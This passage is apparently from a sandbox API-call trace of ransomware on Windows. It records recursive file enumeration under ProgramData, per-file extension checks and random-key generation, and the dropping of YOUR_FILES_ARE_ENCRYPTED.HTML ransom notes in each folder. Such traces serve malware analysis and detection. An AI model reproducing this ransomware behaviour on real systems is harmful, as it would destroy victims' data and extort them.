ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0156.757] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x95b71b60, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.758] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83da3d14, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x842daf62, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x83da3d14, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x536, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0156.758] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 104 [0156.758] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.758] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.758] lstrlenW (lpString=".xml") returned 4 [0156.758] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.758] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0156.758] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.759] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83da3d14, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x842daf62, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x83da3d14, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0156.759] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0156.759] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0156.759] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0156.760] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0156.762] CloseHandle (hObject=0x5a0) returned 1 [0156.762] GetProcessHeap () returned 0x270000 [0156.763] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0156.763] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647bcc04, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647bcc04, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x112e5ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x60, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0156.763] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 96 [0156.763] lstrcmpW (lpString1="folder.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.763] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0156.763] lstrlenW (lpString=".ico") returned 4 [0156.763] PathFindExtensionW 
(pszPath="folder.ico") returned=".ico" [0156.763] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6487b2e4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x6487b2e4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x112e5ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x0, dwReserved1=0x60, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0156.763] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 96 [0156.763] lstrcmpW (lpString1="netfol.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.763] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0156.763] lstrlenW (lpString=".ico") returned 4 [0156.763] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0156.763] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647e2d64, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647e2d64, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x0, dwReserved1=0x60, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0156.763] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 98 [0156.763] lstrcmpW (lpString1="pictures.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.763] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0156.763] lstrlenW 
(lpString=".ico") returned 4 [0156.763] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0156.763] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647bcc04, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647bcc04, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0156.763] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 98 [0156.763] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.763] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.763] lstrlenW (lpString=".xml") returned 4 [0156.763] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.763] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.764] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.764] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64808ec4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64808ec4, ftLastAccessTime.dwHighDateTime=0x1ca0409, 
ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x0, dwReserved1=0x60, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0156.764] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 99 [0156.764] lstrcmpW (lpString1="ringtones.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.764] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0156.764] lstrlenW (lpString=".ico") returned 4 [0156.764] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0156.764] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64808ec4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64808ec4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x0, dwReserved1=0x60, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0156.765] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 98 [0156.765] lstrcmpW (lpString1="settings.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.765] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0156.765] lstrlenW (lpString=".ico") returned 4 [0156.765] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0156.765] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6482f024, ftCreationTime.dwHighDateTime=0x1ca0409, 
ftLastAccessTime.dwLowDateTime=0x6482f024, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x0, dwReserved1=0x60, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0156.765] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 94 [0156.765] lstrcmpW (lpString1="sync.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.765] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0156.765] lstrlenW (lpString=".ico") returned 4 [0156.765] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0156.765] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1137e43c, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x1137e43c, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0156.765] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 95 [0156.765] lstrcmpW (lpString1="tasks.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.765] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0156.765] lstrlenW (lpString=".xml") returned 4 [0156.765] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0156.765] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.765] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.766] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64855184, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64855184, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x60, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0156.766] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 93 [0156.766] lstrcmpW (lpString1="wmp.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.766] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0156.766] lstrlenW (lpString=".ico") returned 4 [0156.766] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0156.766] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64855184, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64855184, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x60, cFileName="wmp.ico", cAlternateFileName="")) returned 0 [0156.766] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) 
returned 1 [0156.766] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0156.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.767] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.768] CloseHandle (hObject=0x598) returned 1 [0156.769] GetProcessHeap () returned 0x270000 [0156.770] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.770] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0156.770] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 85 [0156.770] GetProcessHeap () returned 0x270000 [0156.770] RtlAllocateHeap (HeapHandle=0x270000, 
Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.770] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0156.770] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*" [0156.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.772] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.772] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x96010446, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0156.772] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 91 [0156.772] GetProcessHeap () returned 0x270000 [0156.772] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0156.772] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0156.773] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*" [0156.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x96010446, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, 
ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0156.773] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x96010446, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.773] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f5f4ea, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x852ccb00, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0156.773] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 104 [0156.773] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.773] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.773] lstrlenW (lpString=".xml") returned 4 [0156.773] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.773] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0156.773] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.774] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f5f4ea, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x852ccb00, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0156.774] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0156.774] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0156.774] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0156.774] WriteFile (in: hFile=0x5a0, 